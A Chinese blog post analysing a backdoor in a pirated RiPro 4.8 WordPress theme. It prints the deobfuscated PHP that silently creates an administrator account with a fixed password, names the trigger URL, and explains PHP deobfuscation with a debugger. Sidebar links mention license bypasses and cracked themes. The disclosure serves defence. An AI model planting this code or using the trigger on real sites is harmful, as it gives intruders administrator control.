网传分享的Wordpressripro主题4.8版本后门分析_盾给网下载修复文件[建站教程]

最新推荐文章于 2024-06-14 17:53:28 发布
最新推荐文章于 2024-06-14 17:53:28 发布
阅读量2.1k 收藏
点赞数
分类专栏: wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinzen/article/details/103591438
版权

关于最近网传的日主题ripro4.8版本破解版的后门问题,源码分享源头不清楚,盾给网也是转载免费分享,没想到中了套路。所有在网络上(无论是盾给源码下载网或是其他网站)下载到ripro4.8源码的朋友请好好阅读此文章:

下载后用D盾扫描
1576567574-a25ab78deb7ecfe
发现有加密文件,用Notepad++查看
1576567576-c3241cdc94dce50
破解混淆加密后得到源文件
1576567577-c849ed028514d54
经查看发现后门代码
1576567577-3ca0a218d1c6aa6

01

02

03

04

05

06

07

08

09

10

11

12

add_action('wp_head''wp_backdoor');

function wp_backdoor()

{

        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {

                require('wp-includes/registration.php');

                if (!username_exists('backdoor')) { //检测是否存在backdoor账户

                        $user_id = wp_create_user('backdoor''123456'); //创建账户

                        $user new WP_User($user_id);

                        $user->set_role('administrator'); //设置为管理员权限

                }

        }

}

使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试
1576567579-3700406950b9c71

1576567580-f4ebd98c151e664

1576567581-035dc56e97c7a11
成功登录后台
1576567582-fc7127e6fc60957

1576567583-6c64455feacc5b9
推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。

看到有人想要学习解密php混淆加密
使用工具:PHP7.2+XDebug+VSCode{必备插件[PHP Debug(XDebug调试)+PHP IntelliSense(代码格式化)+Code Runner(快速运行php文件,方便调试)}
当然还有其他配置比如:XDebug安装,Code Runner php文件路径配置等,还是等下一次再出个php调试环境详细配置教程吧。
原文件用VSCode打开是这样的

先格式化(右键-格式化文档,多格式化几次)

保存,改编码为Western (Windows 1252)【本次解密非必须】

使用 Ctrl + Shift + P 打开快捷指令,输入 encoding,选择用 Change File Encoding,选择 Reopen with Encoding,选择 Western (Windows 1252)。

Windows 1252 是个单字节的字节集,不会出现任何 2 个字节被显示成 1 个字符的问题,其他的单字节集通常也可以。 ——@Ganlv

创建PHP调试launch.json文件
1576567638-d6447a790d87937
默认配置就可以了,开始调试
1576567723-214cdcd4bab97ef
运行PHP文件
1576567761-c8ff2dc065c779c
单步调试(F11)
1576567766-eb0fbe57421de1a
一直调试可以看见不停的给变量赋值解密函数
1576567768-c1a6cd8ead3c01e
多运行几步就会发现源码直接出来了
1576567771-c2843e639887a2a
比起Ganlv大神解密的zym/phpjm混淆解密还简单,毕竟没有反调试。
很适合新手入门破解,欢迎交流学习。

解密后的文件

蓝奏盘:https://www.lanzous.com/i836ukh

后门代码已注释,位于412-423行

原文地址:http://www.dungei.net/8976.html

sinzen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
主题RiPro-V2绕过授权的方法
LinkAFF的博客
04-18 303
3、在wp服务器修改hosts指向该授权服务器IP。如果是在同一个服务器搭的,修改/etc/hosts,加上这一行。1、创一个,绑定ritheme.com域名,并开启SSL(随便找个域名的证书就行),上以下源码。2、刚才源码中的keygen.php上到任意地方,访问后,生成授权码和token。机器推荐 最低配置 AMD EPYC 2H4G 1.5英镑/月 无限流量。4、使用生成的授权码激活。
最新RiPro6.3.8 wordpress主题最新版完整修复后门和加密文件
工具下载
03-09 454
介绍: 全新发布,更加专业,资源,素材,源码运营首选,支付宝原生/当面付、微信扫码/H5支付、码支付、虎皮椒、PAYJS。 QQ/微信/微博一键登录,付费下载、付费查看、支持卡密、会员、推广佣金、作者佣金、前端发布资源等。 主要功能特色:支持免登录购买支持付费资源下载支持付费资源查看自带会员中心微信支付;支付宝支付)码支付接口虎皮椒支付PAYJS支付H5唤醒APP支付4 |4 l, s0 [) I4 \J7 s8 ]微信内JSAPI支付3 E% [+ D1 x; t. \8 R2 L支持卡密充值–自定义会
主题v2 Ripro-V2 v4.8 付费资源下载主题+正版
06-27
主题v2 Ripro-V2 v4.8 付费资源下载主题+正版 正式版4.8.0 2023-5-12最新5条更新 1. 修复重要安全BUG内容,议所有用户立刻更新最新版。 2. 修复文章价格为负数时,使用余额支付方式支付导致余额增加的重大BUG。 3. 修复文章价格为负数时,前端提示价格错误弹窗。 4. 修复使用余额支付时,任何时候都不支持负数金额购买。 5. 4.8版本更新后,后台主题设置中重新保存下激活信息,如果一直转圈圈,则刷新一下浏览器缓存即可,因为js文件有更新 RiPro-V2是一个RiPro主题的全新升级重构,首页拖拽布局,高级筛选,自带会员生态系统,超全支付接口,你喜欢的样子我都有!演示地址:https://25qi.cn/57 无需插件集成强大的支付,后台管理,用户体验舒服。支持卡密,充值,积分,会员,高级筛选,推广佣金,作者佣金,前台创文章,统计,自定义币种,自定义会员标识,全功能实现AJAX,图片全真正懒加载,支持SEO,注册邮件验证码,等等等等!最新支付接口已集成支持:微信支付宝官方,讯虎支付,虎皮椒,Payjs,Paypal,易支付,内余额,卡密支付
ripro主题如何使用memcached来加速
最新发布
jiyc2008的博客
06-14 437
但好多人这么多的却发现没啥加速效果,原因就在于wordpress里缺少了memcache文件。只需要把object-cache.php这个文件拷贝到wordpress的wp-content这个目录下即可。ripro主题是个很不错的资源付费下载主题主题自带了缓存加速开关,只要开启了缓存加速功能,正常情况下能让访问的速度提升很大。我把这个文件放在百度盘,需要的下载即可。
Ripro-v2 4.8 新版本专用易支付USDT收款插件
m0_75173775的博客
01-05 977
Ripro-v2 4.8 新版本专用易支付USDT收款插件需配合易支付加易支付usdt插件。
WordPress日主题RiPro v8.9 无加密无后门免扩展无限制开心版(已测试)
okmad的博客
02-12 1751
RiPro主题主要功能 虚拟资源收费功能:支持付费资源下载、支持付费资源查看 支持多种充值消费模式:免登录购买、卡密充值、内余额充值消费 自带会员管理系统:会员中心、自定义会员名称 支付接口多:微信、支付宝、码支付、虎皮椒/讯虎、PAYJS、H5唤醒APP、微信内JSAPI 加强用户参与:推广佣金、功能支持前端投稿 多样化登陆方式:支持QQ、公众号、微信、微博、AJAX交互登录 主题布局合理:首页自定义布局、全面自适应布局开发 外观精美高端:视膜图标支持、丰富的图标ICON、友好CSS排版 高标准规范代
WordPress 虚拟资源商城主题 RiPro-V2-v4.8.0
03-11
WordPress 虚拟资源商城主题 RiPro-V2_v4.8.0
Chrome插件_v4.8版本(用于搭载GreasyFork脚本).zip
05-14
Chrome插件的v4.8版本是其特定的更新迭代,通常意味着它包含了一些新的特性、性能优化或者bug修复。用户可以通过这个版本来提升浏览体验,利用GreasyFork脚本来实现例如广告拦截、自动化填充表单、增强社交媒体功能...
6.1.x DS3617 络驱动extra3617_v4.8.rar
05-15
标题中的"6.1.x DS3617 络驱动extra3617_v4.8.rar"指的是一个针对DS3617设备的络驱动程序,版本号为4.8,它被封装在一个名为"extra3617_v4.8.rar"的压缩文件中。这个驱动程序主要作用是提升DS3617设备在络通信...
S120驱动器_PROFIBUS通信_GSD文件_V4.8_SI2980E5.zip
12-31
"V4.8"通常代表这个驱动器或通信模块的固件版本号,这表明该版本可能包含了一些新的功能、优化或错误修复,以提升S120驱动器与PROFIBUS络的兼容性和性能。 在压缩包内的文件中,"si80e5_n.bmp"可能是一个设备的...
腾和装修系统 v4.8
12-03
腾和装修系统基于ASP+ACCESS环境开发。本程序是由腾和络多年经验而开发,简单实用。利于优化,后台简洁明了,非常实用,是中小企业不错的选择。 后台管理: 地址:域名/admin/ 用户名:admin 登陆...
wordpress主题_ripro美化子主题_虎造子主题集成后台美化包v2.0
05-20
wordpress主题_ripro美化子主题_虎造子主题集成后台美化包v2.0
最新RIPro-V2子主题V1.4-VAN主题分享原创.zip
09-18
基本介绍: VAN主题是一款基于日主题系列旗下RIPro-v2主题所开发的一款子主题,其目的是为了将RIPro-V2主题发挥到极致,助力长更好的发展,操作易上手,功能超多且强大!感兴趣的小伙伴可以下载安装品尝一下哟!详情点开查看哟! 配置要求: RIPro-V2主题版本:正版RIPro-V2主题 PHP版本要求: 必须PHP7.4 VAN主题仅支持:正版主题 VAN主题当前版本: V1.1 VAN主题设置: 全功能后台设置,无需改代码 主题升级更新: 下载解压上 注意事项: 1:主题升级,先在宝塔备份父主题与子主题后在删除子主题文件夹后重新上版本解压之后立即进入后台保存即可不用重新配置 2:VAN主题1.0版本以及之后版本都将使用PHP7.4版本,安装提示错误时请注意需要切换PHP版本为7.4,并且安装RIPro-V2主题专用的Swoole Loader扩展 基本功能 LOGO扫光 点击爆炸特效 注册赠送会员 排行榜小工具 案例展示小工具 合作伙伴小工具 推广注册赠送会员 文章排行榜小工具 微信内访问关闭商城 文章评论展示小工具 文章广告展示小工具 基本教程 安装主题 第一步将下载的压缩包解压后,可以看到名为van的.zip压缩包,把他上到/wp-content/themes/直接解压即可。完成后到后台-外观-启用:VAN主题 QQ群联盟 进入你的管理后台,找到页面点击进入.找到新页面,右侧模板选择选择QQ群联盟模板,链接填qq_group 监控设置 进入你的管理后台,找到页面点击进入.找到新页面,右侧模板选择选择自助友情页模板,链接填blinks 更新记录 V1.4 - 2021.10.1 新增自助友情链接页 新增用户离开时标题变换 新增侧边栏动态时间小工具 新增首页图片广告位小工具 新增纯标题文章列表块小工具 V1.3 - 2021.09.15 新增文字输入爆炸效果 新增悬浮图片广告位功能 新增复制弹窗版权提示功能 新增随机增加文章阅读量功能 后台设置项整体布局排版优化 修复TAG自定义变量导致的问题 给每个上图片增加上删除按钮 推广注册送会员恢复可赠送永久会员,改为不可设置赠送天数 V1.2 - 2021.09.14 新增樱花特效 新增彩色标签 新增爱心点击特效 新增QQ群联盟页面 修复推广注册送会员问题 新增自定义标签后缀功能 推广注册送会员与注册送会员改为只能送普通会员 修复统计小工具与视差背景小工具样式冲突问题 V1.1 - 2021.09.10 新增排行榜小工具 新增统计小工具 新增案例展示小工具 新增合作伙伴小工具 新增注册推广赠送会员功能 新增文章侧边栏评论展示小工具 新增文章侧边栏广告展示小工具
wordpress主题Ripro-v2爬虫模块和接口
04-20
1、支持最新版WordPress 5.9,对Riprov2主题版本无限制。 2、发布模块支持所有版本,免登陆发布。 3、支持同步爬取发布文章。 4、接口支持各种WP主题的自定义字段,例如下载地址、解压密码等字段。
【整程序】wordpress-RiPro-V2去授权WordPress主题虚拟收费主题源码下载
05-24
【整程序】RiPro-V2去授权WordPress主题RiPlus虚拟收费主题源码下载RiPro-V2是一个优秀的主题,首页拖拽布局,高级筛选,自带会员生态系统,超全支付接口,你喜欢的样子我都有!RiPro主题,更强大的全资源/素材类主题,无需插件,集成强大的支付,后台管理,用户体验舒服。支持卡密,充值,积分,会员,高级筛选,推广佣金,作者佣金,前台创文章,统计,自定义币种,自定义会员标识,全功能实现AJAX,图片全真正懒加载,支持SEO,注册邮件验证码,等等等等!最新支付接口已集成支持:微信支付宝官方,讯虎支付,虎皮椒,Payjs,Paypal,易支付,内余额,卡密支付。 环境要求的配置:PHP 7.4 和 Mysql 5.7+ 虚拟机环境安装php独立扩展swoole
WordPress高清图片展示主题Perimg破解版免费下载
07-04
WordPress高清图片展示主题Perimg破解版免费下载给更多有需要的人
shopex-single-4.8.5.45144.rar_build66v_shopex_single_店管理
09-24
《ShopEx Single 4.8.5.45144:店管理系统的全面解析》 ShopEx Single 4.8.5.45144是一款专为个人创业者设计的店程序,它以其易用性和高效管理能力,成为了个人开设的理想选择。这款软件的出现,极大地简化...
主题9.2,Ripro9.2无加密全解密版去扩展版修复bug
卢衍飞
03-02 640
最近发现有很多人喜欢用高版本,Ripro8.9的现在市面上泛滥的都是加密的,听说还有后门,加了密的程序咱也看不到里面是什么,不放心,解密的就放心多了,下面我介绍一下,Ripro9.2的无加密版,在Ripro9.1和9.0的基础上又修复了很多东西,下面我列出一下使用的修复的重大功能,1.去扩展(原版需要安装扩展才能用,去除了扩展,大家都知道有的主机,不能安装扩展,有的新手安装扩展比较麻烦,去除了,可以直接在虚拟机上用,免安装扩展,省去了很多麻烦)5.修复了加载慢 cdn不稳定,,修复内置的支付接口,
opencv4.8 opencv_videoio_ffmpeg_64.dll
10-06
opencv_videoio_ffmpeg_64.dll是OpenCV库的一部分,用于支持视频读取和写入功能。OpenCV是一个开源的计算机视觉库,提供了很多图像处理和计算机视觉方面的功能和算法,包括读取、处理和保存视频。 opencv_videoio_ffmpeg_64.dll是通过集成FFmpeg库来实现视频读取和写入功能的一个模块。FFmpeg是一个开源的多媒体处理库,支持许多常见的音视频格式,包括各种编码和解码操作。通过集成FFmpeg,OpenCV能够读取和处理多种格式的视频文件。 使用opencv_videoio_ffmpeg_64.dll,我们可以使用OpenCV提供的函数来打开、读取和显示视频文件,还可以进行一些处理操作,比如在视频中检测物体、跟踪轨迹等。同时,我们还可以使用OpenCV将处理后的视频保存为不同格式的文件,或者将处理结果输出到实时流中。 由于FFmpeg库的强大功能和广泛支持的音视频格式,opencv_videoio_ffmpeg_64.dll为OpenCV提供了更多的视频处理能力,使得开发者能够更方便地在计算机视觉和图像处理领域开展工作和研究。 综上所述,opencv_videoio_ffmpeg_64.dll是OpenCV中用于视频读取和写入功能的关键模块,通过它,我们可以打开、读取、显示和保存各种常见的视频文件,从而更方便地进行计算机视觉相关的研究和应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值